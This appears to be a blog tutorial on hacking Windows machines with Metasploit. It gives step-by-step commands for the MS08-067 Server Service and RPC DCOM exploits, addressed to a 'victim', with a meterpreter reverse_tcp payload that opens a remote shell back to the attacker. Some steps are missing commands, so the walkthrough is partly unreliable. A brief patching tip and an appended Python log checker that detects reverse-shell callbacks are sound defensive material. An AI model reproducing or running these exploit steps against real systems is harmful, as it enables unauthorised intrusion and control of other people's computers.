In this tutorial, I show you a couple of common exploit modules, how to use them, set the variables, and actually exploit. Without further ado, let’s dive in.
#1 Microsoft Server Service Relative Path Stack Corruption.
This module exploits a parsing flaw in “NetAPI32.dll” through the Server Service. This is an old, but still amazingly useful exploit. It can target Windows XP SP2 and Windows XP SP3. It has an automatic target-detection option, so you don’t have to worry about which operating system your victim has; it will find out on its own.
Let’s try and use it.
Now let’s see which options we need to set by typing:
»show options
We need to set RHost (the remote host). The port (RPort) is set to 445 by default.
Now input the IP of your victim:
»set rhost 126.96.36.199
Now we need to choose a payload. We will use the meterpreter payload this time because it’s one of the best payloads out there. (More on this later on.)
»set payload windows/meterpreter/reverse_tcp
Type ‘show options’ again. Now it says we need to set LHost and LPort. LHost is your IP address and LPort can be whatever port you want; put in a random four-digit number above 1024. For example, below I use 4444:
»set lhost 192.168.2.100
»set lport 4444
Everything is set and now we are ready to engage! Go ahead and simply type ‘exploit’, and if the attack is successful you should see a new meterpreter session open. You are in the system. (What you can do after this will come later.)

[Technical information] This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.
#2 RPC DCOM Interface Overflow
This module exploits a stack buffer overflow in the RPC Service. It can exploit English versions of:
►Windows NT 4.0 SP3
Okay, let’s start. Type:
Now let’s add the payload (the same one as in the exploit above):
»set payload windows/meterpreter/reverse_tcp
Next, we need to see which options we need to set. Set LHost to match your local IP, RHost to match the victim’s, and LPort to your desired port (four digits, greater than 1024).
»set lhost 192.168.2.100
»set rhost 192.168.2.105
»set lport 4444
Now you can type ‘exploit’, and if the attack was successful you will get a meterpreter session.
These were just two relatively smooth examples. Metasploit currently has over 1000 different exploits: that’s 1000 exploitable bugs and vulnerabilities that can be used to get into the victim’s computer. Mac OS, Linux and obviously Windows all have numerous available exploits, any one of which is all we need to get access to the remote system. This just goes to show how vulnerable almost every piece of software, or even whole operating systems, are. With new exploits being discovered by the minute, it is vital to stay on top of the game when it comes to protecting yourself.
One thing anyone can easily do is keep their software and antivirus updated. Among added functionality and other things, these seemingly routine updates for any software or application often carry patches and fixes for vulnerabilities. (Obviously, no company is going to proudly announce: “In this version we are releasing a fix for a bug which might have compromised a million systems already. Enjoy!”)
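Both walkthroughs above rely on the same two-step pattern: an inbound connection to a Windows service port, then the victim calling back out to the attacker's LPort (the reverse_tcp payload). That pattern is also what a defender can look for. The following is an added example and not part of the original tutorial: a small Python checker run over constructed connection-log lines. The log format, the 60-second window and port 135 (the RPC endpoint the DCOM module connects to) are my assumptions; port 445 and the reverse_tcp callback are from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real traffic): "<ISO time> <src>:<sport> -> <dst>:<dport>"
SAMPLE_LOG = """\
2024-01-01T10:00:00 192.168.2.100:51000 -> 192.168.2.105:445
2024-01-01T10:00:03 192.168.2.105:49152 -> 192.168.2.100:4444
2024-01-01T10:05:00 192.168.2.50:51001 -> 192.168.2.105:445
2024-01-01T10:10:00 192.168.2.105:49153 -> 192.168.2.50:8080
"""

# 445 (Server Service over SMB) is from the tutorial; 135 (RPC endpoint mapper,
# where the DCOM module connects) is an assumption added here.
SERVICE_PORTS = {445, 135}
WINDOW = timedelta(seconds=60)  # assumed: the callback normally follows within seconds
LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+)$")


def parse(log: str):
    """Yield (timestamp, src, sport, dst, dport) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m.group(1)), m.group(2),
                   int(m.group(3)), m.group(4), int(m.group(5)))


def find_reverse_shell_pairs(log: str, service_ports=SERVICE_PORTS, window=WINDOW):
    """Return (victim, attacker, callback_port) for every inbound connection to a
    service port that is followed, within `window`, by the victim opening an
    outbound connection back to the same peer on a port above 1024 (the
    reverse_tcp callback). Assumes the log lines are in time order."""
    inbound = defaultdict(list)  # (victim, attacker) -> [times of service-port hits]
    hits = []
    for ts, src, sport, dst, dport in parse(log):
        if dport in service_ports:
            inbound[(dst, src)].append(ts)
        elif dport > 1024:
            recent = [t for t in inbound.get((src, dst), []) if timedelta(0) <= ts - t <= window]
            if recent:
                hits.append((src, dst, dport))
    return hits


if __name__ == "__main__":
    for victim, attacker, port in find_reverse_shell_pairs(SAMPLE_LOG):
        print(f"{victim} called back to {attacker}:{port} shortly after a service-port hit")
```

The second service-port hit in the sample is not flagged because the later outbound connection falls outside the window; in practice the window and the service-port set should match what the monitored hosts actually expose.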